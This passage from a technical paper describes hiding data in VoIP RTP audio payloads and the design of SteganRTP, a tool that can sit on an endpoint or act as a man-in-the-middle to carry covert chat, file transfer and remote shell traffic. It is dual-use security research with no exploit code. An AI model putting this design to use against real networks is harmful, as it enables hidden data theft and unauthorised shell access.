the RTP +packet's encoded payload are determined by the Codec that is used to encode +the audio transmitted by an individual packet. The Codec focused on during +this research, G.711, uses a 1-byte sample encoding and is generally resilient +to modifications to the least significant bit (LSB)[18] of each sample. Codecs +with larger samples may provide for one or more bits per sample to be modified +without any discernible audible change in the encoded audio, which is defined +as the audio's audible integrity. + +2.2.1) Audio Word Size + +The data value word size, or sample size in audio terminology, used by various +audio encoding formats is one factor in determining the amount of available +space within the cover-medium for embedding a message. Generally only the +least significant bit of each word value can be expected to be modifiable +without any perceptible impact to audible integrity. Thus, only half the +amount of available space in an audio cover-medium encoded in a format with a +16-bit word size will be available in comparison with a cover-medium with an +8-bit word size. + +2.2.2) Common VoIP Audio Codecs + +For reference, some common VoIP audio Codecs and their encoding and sample +properties[19] are listed in the table below. + + +------------+----------+-------------+-------------+------------+ + | Codec | Standard | Bit Rate | Sample Rate | FrameSize | + | | by | (kb/s) | (kHz) | (ms) | + +------------+----------+-------------+-------------+------------+ + | G.711 | ITU-T | 64 | 8 | Sampling | + | G.721 | ITU-T | 32 | 8 | Sampling | + | G.722 | ITU-T | 64 | 16 | Sampling | + | G.722.1 | ITU-T | 24/32 | 16 | 20 | + | G.723 | ITU-T | 24/40 | 8 | Sampling | + | G.723.1 | ITU-T | 5.6/6.3 | 8 | 30 | + | G.726 | ITU-T | 16/24/32/40 | 8 | Sampling | + | G.727 | ITU-T | variable | | Sampling | + | G.728 | ITU-T | 16 | 8 | 2.5 | + | G.729 | ITU-T | 8 | 8 | 10 | + | GSM 06.10 | ETSI | 13 | 8 | 22.5 | + | LPC10 | U.S. Gov | 2.4 | 8 | 22.5 | + | Speex (NB) | | 8, 16, 32 | 2.15 - 24.6 | 30 | + | Speex (WB) | | 8, 16, 32 | 4 - 44.2 | 34 | + | iLBC | | 8 | 13.3 | 30 | + | DoD CELP | U.S. DoD | 4.8 | | 30 | + | EVRC | 3GPP2 | 9.6/4.8/1.2 | 8 | 20 | + | DVI | IMA | 32 | Variable | Sampling | + | L16 | | 128 | Variable | Sampling | + +------------+----------+-------------+-------------+------------+ + Common VoIP Audio Codecs + +2.2.3) G.711 (alaw/ulaw) + +The G.711 audio Codec is a fairly straight-forward sample-based encoding. It +encodes audio as a linear grouping of 8-bit audio samples arranged in the +order in which they were sampled. + +Throughput + +Utilizing the LSB of every sample in a G.711 encoded RTP payload, which is +commonly of 160 bytes in size, a total of 20 bytes of message data can be +successfully embedded. Given an average of 50 packets per second +unidirectional, this results in approximately 1,000 bytes of full-duplex +throughput of message data within the established covert channel. + +2.3) Identified Problems and Challenges + +Many problems and challenges that arise when considering the use of +steganography with RTP stem from properties of the underlying transport +mechanism, the nature of real-time audio, or the RTP protocol itself. The +following sections outline various problems and challenges that were +identified when attempting to use steganography with RTP. + +2.3.1) Unreliable Transport + +One of the most significant challenges to utilizing RTP packet payloads as +cover-medium is that RTP generally employs UDP as its underlying transport +protocol. This is appropriate for a streaming multimedia protocol, however it +is less than ideal for a reliable covert communications channel. UDP is a +datagram messaging protocol which is considered connectionless and unreliable[5]. +As such, each packet's successful delivery and order of arrival is not +guaranteed. Any message data which is split across multiple RTP cover-packets +may arrive out of order or not arrive at all. + +2.3.2) Cover-Medium Size Limitations + +The RTP protocol, being designed for ``real-time'' transport of media, behaves +like a streaming protocol should. RTP datagram packets are relatively small +and there are usually tens to hundreds of packets sent per second in the +process of relaying audio between two peers. Additionally, different audio +Codecs provide for different encoded audio sample sizes, resulting in a +variable amount of available space for embedding which is dependent upon which +Codec the audio for any individual RTP packet is encoded with. Due to the +small size of these packets and the common constraint among many +steganographic embedding methods which limits the amount of data that is able +to be embedded to a fraction of the size of the cover-medium, a very limited +amount of space is actually available for the embedding of message data. As +such, large message data will inevitably be required to be split across +multiple cover-packets and thus must be reassembled at its destination. + +2.3.3) Latency + +RTP is, by design, extremely susceptible to media degradation due to packet +latency. As such, any processing overhead from the embedding of message data +into the cover-medium or delay due to inspection of potential cover-medium +packets may have a noticeable impact on the end-user's quality of experience. +When manipulating an RTP stream between two endpoints that are expecting +packet delivery in a timely manner, a steganographic system cannot be overly +invasive when packets are not needed for embedding and must be efficient at +its task when they are. + +2.3.4) Tracking of RTP Streams + +In normal operation, RTP establishes two packet streams to form a session +between two endpoints. Each endpoint uses one stream to send multimedia data +to the other, thus achieving full-duplex communication via two unidirectional +packet streams. When identifying an RTP session to be utilized as +cover-medium for a full-duplex covert communications channel, the two paired +streams must be correctly identified and tracked. + +2.3.5) Raw vs. Compressed Audio + +It is important to consider that audio being transported via RTP may be +compressed. To successfully embed message data into a cover-medium, it is +generally required that it is performed against the raw data so as to properly +identify and utilize the cover-medium's redundant bits. As such, +identification of compressed cover-medium, decompression, modification of the +raw data, and then re-compression may be required. + +Lossy vs. Lossless Compression + +When considering the potential use of compression within the cover-medium, it +is also important to consider the type of compression used. Most compression +methods can be categorized into two types; lossy compression and lossless +compression. + +If the compression method used is of the lossy type, the integrity of any +message data embedded into the cover-medium prior to compression may be +compromised when the stego-medium is uncompressed as some of the original +audio data may be lost. Due to this property of lossy compression types, +audio data compressed in this manner may not be appropriate for use as +cover-medium without additional safeguards against this loss. + +2.3.6) Media Gateway Audio Modifications + +RTP, as a protocol being potentially routed across multiple networks by its +underlying transport, network, and data-link protocols, may also be routed or +gatewayed along its path by other intermediary telephony devices like Media +Gateways or Back-to-Back User Agent (B2BUA) devices. At such transition +points, the media being transported may undergo potential modification. Some +of these modifications include translation from one audio Codec to another, +down-sampling, normalization, or mixing with other audio streams. Invasive +changes such as these can potentially impact the integrity of any message data +embedded within the stego-medium. + +Audio Codec Conversion + +Codec conversion takes place when an intermediary device such as a Media +Gateway is providing translation services for two endpoints that support +disparate sets of Codecs. For example, one endpoint may support GSM encoding +of audio and the other only G.711 or Speex encoding. Unless an intermediary +translator is involved, these two devices cannot directly establish an RTP +audio channel. The intermediary device essentially translates audio from the +Codec being used by one endpoint to a Codec that can be understood by the +other. Audio Codec conversion may also take place if the inherent latency or +Quality-of-Service (QoS) properties of the transport network on either side of +the intermediary device requires a lighter-weight Codec. + +Down-sampling and Normalization + +Down-sampling and normalization may be performed on an audio payload to bring +the properties of the audio such as volume and background white-noise more in +line with the other party's audio stream. Occasionally this task is handled +by the endpoint devices when playing the media for the user. In that scenario +the integrity of the stego-medium will likely remain intact as the audio +payload isn't actually modified in transit. However, there are scenarios +where an intermediary media device may actually re-sample or otherwise modify +the payload of the media stream specifically to alter its audible properties. +In these cases, the integrity of the stego-medium may become compromised. + +Audio Stream Mixing + +When performing conferencing or other types of multi-party calls, it is +possible that multiple party's audio streams may be mixed together. Such +invasive modification of the audio will almost certainly compromise the +integrity of the stego-medium. + +2.3.7) Mid-session Audio Codec Change + +Most VoIP signaling protocols provide methods for VoIP endpoints to change the +audio encoding method on the fly. Due to this functionality an RTP session +may begin using one Codec and then switch to a completely different Codec +mid-session. This functionality may be used for a variety of reasons +including QoS metrics not being met, inclusion of a new endpoint in the call +that does not support the original Codec, or any number of other reasons. Due +to this dynamic nature, any steganographic system attempting to embed data +into an RTP stream's packets must be able to dynamically adjust its message +embedding algorithm to accommodate different Codecs' various sample sizes and +layout within the RTP packet payload. + +3) Reference Implementation: SteganRTP + +3.1) Design Goals + +The goals set forth for the SteganRTP reference implementation[20] are described +in the following subsections. + +3.1.1) Achieve Steganography + +As stated in Section 1.4, the primary goal of steganography is to hide the fact +that communication is taking place. Therefore, it is the primary goal of this +reference implementation to prevent indication to a third-party observer of +the RTP audio stream that anything other than the overt communication between +the two RTP endpoints is taking place. + +3.1.2) Full-Duplex Communications Channel + +This reference implementation intends to achieve a full-duplex covert +communication channel between the two RTP endpoints, mirroring the utility of +RTP itself. This will be accomplished through the use of both RTP streams +that comprise an RTP session. By utilizing both RTP streams within the +session, either application will be able to both send and receive data +simultaneously. + +3.1.3) Compensate for Unreliable Transport + +This reference implementation intends to compensate for the unreliable +transport inherent to RTP. This will be accomplished by providing a data +sequencing, tracking, and resending mechanism. + +3.1.4) Identical User Experience Regardless of Mode of Operation + +This reference implementation intends to provide two distinct modes of +operation. The first mode of operation is described as the SteganRTP +application running locally on the same host as the RTP endpoint. The second +mode of operation is described as the SteganRTP application running on an +intermediary host along the route from one RTP endpoint to another. This +intermediary host must be forwarding or bridging the RTP traffic as an active +man-in-the-middle (MITM). The reference implementation intends for the user +experience of running the SteganRTP application to be identical regardless of +the mode of operation. This will be accomplished by interfacing directly with +the host operating system's network stack in order to hook the desired packet +streams. + +3.1.5) Multi-type Data Transfer + +The reference implementation intends to provide simultaneous transfer of +multiple types of data, such as text chat, file transfer, and remote shell +access. This will be accomplished by providing type indication and formatting +for each type of supported data being transferred. + +3.2) Operational Architecture + +As mentioned in Section 3.1.4 above, the application will operate in one of two +distinct modes: the application running locally on the same host as the RTP +endpoint or the application running as an active MITM . It is not intended +that the two SteganRTP applications which are communicating be operating in +the same mode. Thus, a mixed-mode operation such as is described +below is entirely possible. + +It is important to note that the SteganRTP application is only required to be +bridging or forwarding the RTP stream considered outbound from the closer RTP +endpoint destined for the more remote RTP endpoint. Conversely, the +application is only required to be able to observe the inbound RTP stream +flowing in the other direction as it does not need to invasively modify any +packets from the inbound stream. + +3.3) Application Flow + +When the SteganRTP application begins it performs an initialization phase by +setting up internal memory structures and configuration information from the +command-line. Next, it observes network traffic until it identifies an RTP +session which falls within the constraints specified by the user on the +command-line. These constraints are how the user controls selection of the +RTP sessions between specific RTP endpoints to utilize as cover-medium and, by +virtue, which remote SteganRTP application to communicate with. After +identifying an RTP session, SteganRTP inserts hooks into the host's network +stack in order to receive the desired packets upon transmission or arrival, or +both if the SteganRTP application is operating in the active MITM scenario. +From these hooks a packet queue is created which the application then reads +individual packets from. Whether the packet is considered inbound or outbound +determines the further course of the application. Whether a packet is +considered inbound or outbound is determined by which RTP endpoint network +address and port is defined as ``local'' or ``remote'', which in the case of +the active MITM operation can be inferred as ``near'' or ``far'', +respectively. + +When an inbound RTP packet is read from the queue, it is copied for the +application's use and the original packet is immediately sent as the SteganRTP +application does not need to invasively modify it. All received inbound +packets are assumed to be potential cover-medium for the covert channel, so +potential message data is then extracted from each inbound packet. The +potential message data is then decrypted, and the result is checked for a +valid checksum value in the potential message's header. If the checksum is +valid, the message data is sent to the message handler component for +processing. + +When an outbound RTP packet is read from the queue, the SteganRTP application +immediately polls its outbound data queues for any message data waiting to be +sent. If there is no data waiting to be sent, the packet is immediately sent +unmodified. If there is message data waiting to be sent, as much of that data +as will fit into the cover-medium packet's payload is read from its file +descriptor, packaged as a formatted message, encrypted, and then +steganographically embedded into the RTP packet's payload. The modified RTP +packet is then sent in place of the original RTP packet. + +3.3.1) Initialization + +Upon start-up, SteganRTP first initializes various memory structures such as +message caches, configuration settings, and an RTP session context structure. + +The most notable task performed during the initialization phase is the +computation of keying information used by various components. The method +chosen for creation of this keying information is to create a 20-byte SHA-1[21] +hash of a user-supplied shared secret text string. Due to the result of this +operation being used as keying information by various components of the +overall SteganRTP system, this shared secret must be provided to both +SteganRTP applications that wish to communicate with each other. + +The 20-byte result of the SHA-1 hash function against the user-supplied shared +secret is defined here as the keyhash and described by Equation below where f +represents the SHA-1 hash function. + +keyhash = f( sharedsecret ) + +SHA-1 Collision Irrelevance + +In February of 2005, a group of Chinese researchers developed an algorithm for +finding SHA-1 hash collisions faster than brute force. They proved it +possible to find collisions in the full 80-step SHA-1 in less than 269 hash +operations, about 2,000 times faster than brute force of the 280 hash +operation theoretical bound. The paper also includes search attacks for +finding collisions in the 58-step SHA-1 in 233 hash operations and SHA-0 in +239 hash operations. The biggest impact that this discovery has pertains to +use of SHA-1 hashes in digital signatures and technologies where one of the +pre-images is known. By searching for a second pre-image which hashes to the +same value as the original, a digital signature for the original may +theoretically be used to authenticate a forgery. + +The use of SHA-1 by the SteganRTP reference implementation is solely to +compute a bit-pad of keying information with a longer, seemingly more random +bit distribution than what is likely provided directly by user input as the +shared secret. The result of the SHA-1 hash of the user's shared secret is +used directly as keying information. In order to launch a collision attack +against the hash used as the bit-pad, the attacker would have to either obtain +the original user-supplied shared secret or the hash itself. Due to the hash +being used directly as keying information, the possession of it by an attacker +has already compromised the security of the data being obfuscated with it; +computing one or more additional pre-images which hash to a collision provides +no additional value for the attacker. + +3.3.2) RTP Session Identification + +RTP session identification is performed using libfindrtp. libfindrtp is a C +library that identifies sessions between two endpoints by observing VoIP +signaling traffic and watching for call set-up. Constraints can be passed to +the library to limit session identification to a single endpoint, specific +multiple endpoints, or even specific multiple endpoints using specific UDP +ports. These constraints are passed through to libfindrtp from the input +provided to the SteganRTP application via the command-line. At the time of +this writing, libfindrtp supports session identification via the Session +Initiation Protocol (SIP)[1] and Cisco Skinny Call Control Protocol (SCCP)[3] +VoIP signaling protocols. + +3.3.3) Hooking Packets + +The SteganRTP application makes use of NetFilter[23] hook points in order to +receive both inbound and outbound RTP session packets. The Linux kernel is +instructed to pass specific packets to an application by inserting an iptables +rule describing the packets with a target of QUEUE. Packets which match a +rule with a target of QUEUE are queued to be read by a registered NetFilter +user-space queuing agent. Access to this queue is provided to the SteganRTP +application via an API provided by the NetFilter C library libipq. An +iptables rule used to hook packets via this interface may be inserted at any +of the NetFilter hook points. + +For the most beneficial use by the SteganRTP application, packets must be +hooked at points where their integrity as stego-medium is maintained. Thus, +inbound packets are hooked at the PRE-ROUTING hook point and outbound packets +are hooked at the POST-ROUTING hook point. In this manner, incoming packets +are able to be processed by the SteganRTP application prior to any potential +modification by the local system and outbound packets are able to be modified +by SteganRTP after the local system is essentially finished with them. + +SteganRTP registers itself as a user-space queuing agent for NetFilter via +libipq. SteganRTP then creates two iptables rules in the NetFilter engine +with targets of QUEUE. The first rule matches the inbound RTP stream at the +PRE-ROUTING hook point. The second rule matches the outbound RTP stream at +the POST-ROUTING hook point. + +3.3.4) Reading Packets + +Using the packet hooks described in the previous section, SteganRTP is then +able to read packets from the provided packet queue, determine if they are +considered inbound or outbound packets, and pass them to the appropriate +processing functions. The processing functions may then analyze them, modify +them if needed, place modified versions back into the queue in place of the +original, and instruct the queue to accept the packet for further routing. + +3.3.5) Inbound Processing + +As outlined above, the basic steps for inbound packet processing are as +follows: + + 1. Immediately accept the packet for routing. + 2. Extract potential message data. + 3. Decrypt potential message data. + 4. Verify the potential message header's checksum. + 5. Send valid messages to the message handler. + +3.3.6) Outbound Processing + +As outlined above, the basic steps for outbound packet processing are as +follows: + + 1. Poll for message data waiting to be sent. + 2. If there is no message data waiting, immediately send the packet and return. + 3. Create a new formatted message with header based on the properties of the + RTP packet who's payload is being used as cover-medium. + 4. Read as much of the waiting data as will fit in the formatted message. + 5. Encrypt the message. + 6. Embed the message into the RTP payload cover-medium. + 7. Send the modified RTP packet in place of the original via the NetFilter + user-space queue. + +3.3.7) Session Timeout + +In the event that no RTP packets are available in the NetFilter queue for a +period of time, all session information is dropped and process flow returns to +the RTP session identification phase to locate a new session for use. + +In the event that RTP packets are being received but no valid messages have +been received for a period of time, the SteganRTP application attempts to +solicit a response from the remote application. If these solicitations have +failed by the timeout period, all session information is dropped and process +flow returns to the RTP session identification phase to locate a new session +for use. + +3.4) Communication Protocol Specification + +The SteganRTP communication protocol makes use of formatted messages which are +steganographically embedded into the payloads of individual RTP packets. This +steganographic embedding creates the covert channel within which the +communication protocol described in the following sections operates. + +3.4.1) The cover medium: RTP Packet + +Below, reproduced verbatim from the RTP specification[4], describes the +RTP packet header. Of special interest are the payload type (PT), sequence +number, and timestamp fields, all of which will become relevant when building, +encrypting, and steganographically embedding the message data into the +packet's payload. The remainder of the packet contains an optional number of +header extensions which are irrelevant to the SteganRTP communication +protocol, and finally the encoded media data, otherwise known as the RTP +packet's payload, which will be utilized by SteganRTP as cover-medium. + + 0 1 2 3 + 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +|V=2|P|X| CC |M| PT | sequence number | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| timestamp | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| synchronization source (SSRC) identifier | ++=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ +| contributing source (CSRC) identifiers | +| .... | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + +The 7-bit payload type field indicates the audio Codec used to encode the +payload. The 16-bit sequence number field is a standard incrementing sequence +number. The 32-bit timestamp field describes the sampling instant of the +first sample in the payload, and the remaining packet data is the audio +payload as encoded by the indicated Codec. + +3.4.2) Message Format + +The format of the messages that the SteganRTP applications use to communicate +with each other is described in the following sections. Below +describes the core message format of all types of SteganRTP formatted +messages. This format consists of two fields, the Checksum / ID and Sequence +fields followed by a standard Type-Length-Value (TLV)[24] structure. The Checksum +/ ID, Sequence, Type, and Length fields comprise the message header, while the +Value field is considered the message body, or payload. + + 0 1 2 3 + 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| Checksum / ID | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| Sequence | Type | Length | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| Value (Type-Defined Body) | +! ! +. . + +The 32-bit Checksum / ID field contains a hash value which is used to identify +whether or not a potential message that is extracted from the payload of an +inbound RTP packet is indeed a valid SteganRTP communication protocol message. +The hashword[25] function is used to compute this hash. The function's two +primary operands consist of the keying information defined as keyhash in +Section 3.3.1 and the sum of the message's Sequence, Type, and Length header +fields. This value is defined as checksumid and is described by Equation +below. + + +checksumid = hashword( keyhash, (Sequence + Type + Length) ) + + +The verification of extracted potential messages is required due to the fact +that some packets in the inbound RTP stream may not contain SteganRTP messages +if there was no outbound data waiting to be sent by the remote application +when the RTP packet in question traversed it. The hash function used to +compute this checksum value incorporates the keyhash so as not to be +computable solely from message data, which would allow an observer to also +verify that a message is embedded within the RTP payload. + +The 16-bit Sequence field is a standard incrementing sequence number, the +8-bit Type field indicates what type of message it is, and the 8-bit Length +field indicates the length, in bytes, of the Value field. The Value field +contains the message's payload. + +3.4.3) Message Types + +The currently defined message types are listed in the table below. + + +----+---------------------+ + | ID | Type | + +----+---------------------+ + | 0 | Reserved | + | 1 | Control | + | 10 | Chat Data | + | 11 | File Data | + | 12 | Shell Input Data | + | 13 | Shell Output Data | + +----+---------------------+ + +Control Messages + +Below describes the format of SteganRTP control messages. Control +messages are used to send non-user data to the remote SteganRTP application to +convey operational information such as requesting a message resend or +indicating that a file is about to be sent and providing that file's context +information. Control messages consist of one or more stacked TLV structures +and are not required to be 32-bit aligned. + + 0 1 2 3 + 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| Control Type | Length | Value | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | +! ! +. . ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| Control Type | Length | Value | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | +! ! +. . + +The 8-bit Control Type field indicates the type of control data contained in +the TLV structure whereas the 8-bit Length field indicates the size, in bytes, +of the Value field. The Value field contains the control data of the +indicated type. + +Control Message Types + +The currently defined control message types are listed in the table below. + + +----+---------------+ + | ID | Type | + +----+---------------+ + | 0 | Reserved | + | 1 | Echo Request | + | 2 | Echo Reply | + | 3 | Resend | + | 4 | Start File | + | 5 | End File | + +----+---------------+ + +Type 1: Echo Request + +The Echo Request control message is used to prompt the remote SteganRTP +application for a response, allowing the local application making the request +to determine if the remote application is still present and communicating. +This message is sent when a session inactivity timeout limit is approaching. +The format of an Echo Request control message: + + 0 1 2 3 + 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| 1 | 2 | Seq | Payload | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + +The Control Type field's value is 1, indicating that it is an Echo Request +control message, and the Length field's value is 2, indicating the 2-byte +control message payload. The control message payload consists of an 8-bit Seq +field which contains a standard incrementing sequence number specific to Echo +Requests, and an 8-bit Echo Request Payload, which contains a random +bit-string. The Seq value is used to correlate sent Echo Request messages +with received Echo Reply messages and the Payload field received in an Echo +Reply message must match the random bit-string sent in its corresponding Echo +Request message. + +Type 2: Echo Reply + +The Echo Reply control message is used to respond to the remote SteganRTP +application's Echo Request message. The format of the Echo Reply message is +identical to the Echo Request message as described in above, however the +Control Type field's value is 2 rather than 1. + +Type 3: Resend + +The Resend control message is used to request the resending of a specified +message by the remote SteganRTP application, allowing the local application to +request missing or corrupted messages. This message is sent when the +application begins to receive messages which contain sequence numbers beyond +the next sequence number that is expected. The format +of a Resend control message: + + 0 1 2 3 + 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| 3 | 2 | Requested Seq Number | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + +The Control Type field's value is 3, indicating that it is a Resend control +message, and the Length field's value is 2, indicating the 2-byte control +message payload. The control message payload consists of a 16-bit Requested +Seq Number field which indicates the sequence number of the message to be +resent. + +Type 4: Start File + +The Start File control message is used to indicate to the remote application +that that local application will begin sending file data for a new file +transfer. This message is sent when the user executes the command to transfer +a file. The format of a Start File control message: + + 0 1 2 3 + 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| 4 | # | File ID | | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | +| Filename | +! ! +. . + +The Control Type field's value is 4, indicating that it is a Start File +control message, and the Length field's value is 1 plus the string length, in +bytes, of the filename of the file being sent, indicating the total size of +the control message payload. The control message payload consists of an 8-bit +File ID field which indicates the sending application's unique ID value for +the file, and the Filename field is the name of the file being sent in ASCII. + +Type 5: End File + +The End File control message is used to indicate to the remote application +that that local application is finished sending file data for a particular +file transfer. This message is sent when the local application has finished +sending all data related to the open file descriptor being used to send data +from a file. The format of a End File control message: + + 0 1 2 3 + 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| 5 | 1 | File ID | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + +The Control Type field's value is 5, indicating that it is a End File control +message, and the Length field's value is 1, indicating the 1-byte control +message payload. The control message payload consists of an 8-bit File ID +field which indicates the sending application's unique ID value for the file +who's transfer is now complete. + +Data Messages + +Non-control messages are considered data messages and contain some form of +actual data for the user, whether it be text chat data, incoming file data, a +command for the local shell service, or a response from the remote shell +service. These various types of data are differentiated by the value of the +message header's Type field. + +Chat Data Messages + +The Chat Data Message is used to transmit text chat data between SteganRTP +applications. This type of data requires no context information, thus the +message payload contains only a single field, Chat Data. + + 0 1 2 3 + 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| Chat Data | +! ! +. . + +File Data Messages + +The File Data Message is used to transmit data file contents between SteganRTP +applications. Because multiple file transfers may be in progress at any given +time, this type of data must be accompanied with context information +indicating which file transfer the chunk of data belongs to. The format of a +File Data message: + + 0 1 2 3 + 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| File ID | File Data | ++-+-+-+-+-+-+-+-+ | +! ! +. . + +The File ID field's value is a unique file ID number chosen for the particular +file transfer taking place and is used to indicate which file transfer the +chunk of data contained in the File Data field belongs to. The File Data +field is a chunk of data from the file being transferred. The proper order +for reconstruction of the file chunks transferred by these messages is ensured +by the message header's sequence number. + +Shell Data Messages + +The Shell Input Data and Shell Output Data Messages are used to transmit shell +input to, and receive shell output from, a remote SteganRTP shell service, +respectively. This type of data requires no context information, thus the +message payload contains only a single field, Shell Data, as described by +below. + + 0 1 2 3 + 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| Shell Data | +! ! +. . + +3.5) Functional Components + +3.5.1) File Descriptor Lists + +Two separate file descriptor lists are maintained; destinations for inbound +data and sources of outbound data. The data structure for storage of a file +descriptor and its data for inclusion in either list is defined +below. + +/* Structure used for file descriptor information */ +typedef struct file_info_t { + u_int8_t id; + char *name; + u_int8_t type; + int fd; + struct file_info_t *next; + struct file_info_t *prev; +} file_info; + +The independence of the file descriptor lists from the outbound data polling +and message handler components provides for a flexible and versatile +environment within which to expand functionality. In order to include new +data types for transfer, all that is required is to define a new data type ID +for both applications to correlate messages upon, open a file descriptor to +the appropriate place to read or write the data, and include the file +descriptor in the appropriate list. + +Inbound File Descriptors + +Inbound File Descriptors are a list of file descriptors for various +destinations that inbound data may be directed to. The order of these file +descriptors as included in the list is irrelevant as which file descriptor +data is destined for is looked up by matching the message type and properties +with the file descriptor's type and properties. + +Chat Interface + +Inbound chat data is written to this file descriptor. This file descriptor is +tied to the chat window of the SteganRTP ncurses interface. + +Remote Shell Interface + +Inbound shell data from the remote application's shell service is written to +this file descriptor. This file descriptor is tied to the shell window of the +SteganRTP ncurses interface. + +Local Shell Service + +Inbound shell data to the local application's shell service is written to this +file descriptor. This file descriptor is tied to the local process providing +shell access. This file descriptor does not exist in the list if the local +shell service is disabled. + +File Transfers + +Any number of file descriptors for data files being actively received may be +appended or removed from the end of the inbound file descriptors list. + +Outbound File Descriptors + +Outbound File Descriptors are polled, in order, for data waiting to be sent. +Due to being polled in order, they are essentially prioritized in that order +and data waiting to be sent from a prior descriptor in the list will have +precedence over data waiting to be sent from a latter descriptor. The file +descriptors included in the outbound list are as follows: + +Raw Message Interface + +Entire, unencrypted outbound messages are written to this file descriptor. +This file descriptor is used for the replaying of entire messages in response +to a Resend control message as described in Section 3.4.3. + +Control Message Interface + +Outbound control messages as described in Section 3.4.3 are written to this file +descriptor after creation. + +Chat Interface + +Outbound chat data is written to this file descriptor. This file descriptor +is tied to the command window of the SteganRTP ncurses interface. All +non-command text entered into the command window while in chat mode is +considered chat data. + +Remote Shell Interface + +Outbound shell data is written to this file descriptor. This file descriptor +is tied to the command window of the SteganRTP ncurses interface. All +non-command text entered into the command window while in shell mode is +considered shell data. + +Local Shell Service + +Outbound shell data from the local shell service is written to this file +descriptor. This file descriptor is tied to the local process providing shell +access. This file descriptor does not exist in the list if the local shell +service is disabled. + +File Transfers + +Any number of file descriptors for data files being actively sent may be +appended or removed from the end of the outbound file descriptors list. + +3.5.2) Message Handler + +The SteganRTP application's message handler receives all valid incoming +messages as verified by the RTP packet receiving system for inbound packets. +This component performs all internal state changes and administrative tasks in +response to control messages. It also handles the routing of inbound data +message payloads to the appropriate file descriptor in the inbound file +descriptors list. + +Administrative Tasks + +Echo Reply + +If an Echo Request control message is received from the remote application, +the message handler constructs an appropriate Echo Reply control message as +described in Section 3.4.3 and writes it to the Control Message Interface file +descriptor in the outbound file descriptor list. + +Start File Transfer + +If a Start File control message is received from the remote application, the +message handler opens a new file descriptor using the file's context +information contained in the control message and appends the file descriptor +to the inbound file descriptors list. + +End File Transfer + +If an End File control message is received from the remote application, the +message handler closes the file descriptor for the file transfer indicated and +removes it from the inbound file descriptors list. + + +Data Routing + +Chat Data + +Inbound text chat data is buffered until a complete line of text is received +and then is written to the Chat Interface file descriptor in the inbound file +descriptors list. A complete line of text is defined as being terminated by a +new-line character. + +File Data + +Inbound file transfer data is written to the appropriate file descriptor in +the inbound file descriptors list for the file transfer that the data belongs +to. + +Shell Input Data + +Shell Input Data messages contain input data for the local application's shell +service and is written to the Local Shell Service file descriptor in the +inbound file descriptors list. + +Shell Output Data + +Shell Output Data messages contain response data from the remote application's +shell service and is written to the Remote Shell Interface file descriptor in +the inbound file descriptors list. + +3.5.3) Encryption 